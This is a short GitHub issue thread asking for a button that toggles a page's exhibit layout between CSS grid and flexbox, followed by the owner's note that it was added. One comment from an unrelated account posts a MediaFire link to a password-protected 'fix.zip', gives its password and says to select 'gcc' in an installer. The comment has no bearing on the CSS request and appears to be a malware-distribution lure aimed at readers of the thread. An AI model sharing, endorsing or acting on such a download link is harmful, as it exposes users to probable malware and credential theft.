### ISSUE TITLE
Add a button that will change how the exhibit are displayed for both flexbox and CSS grid 

### ISSUE THREAD

**Issue by TechEvolvace** [TechEvolvace/buttons-display#5]
# New Additions: 
* In order to demonstrate the concept of CSS grid and flexbox more effectively, a button where the user can click on will change the display property of main area between flexbox and CSS grid
    * The default display property of the main area will be CSS grid, so this button will now display "Display Exhibit with CSS Flexbox" 
    * The button will be placed in the main bar area, in its own designated section 
        * This section area contains the following text: "Currently displaying exhibit through CSS [flexbox or grid]" followed by the button with the appropriate text 
        * When the exhibits are currently displayed through CSS grid, the button should have the text "Display Exhibit with CSS Flexbox" 
        * When the exhibits are currently displayed through CSS flexbox, the button should have the text "Display Exhibit with CSS Grid"

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechEvolvace** [comment]
Successfully added a button to change the display property that changes the message
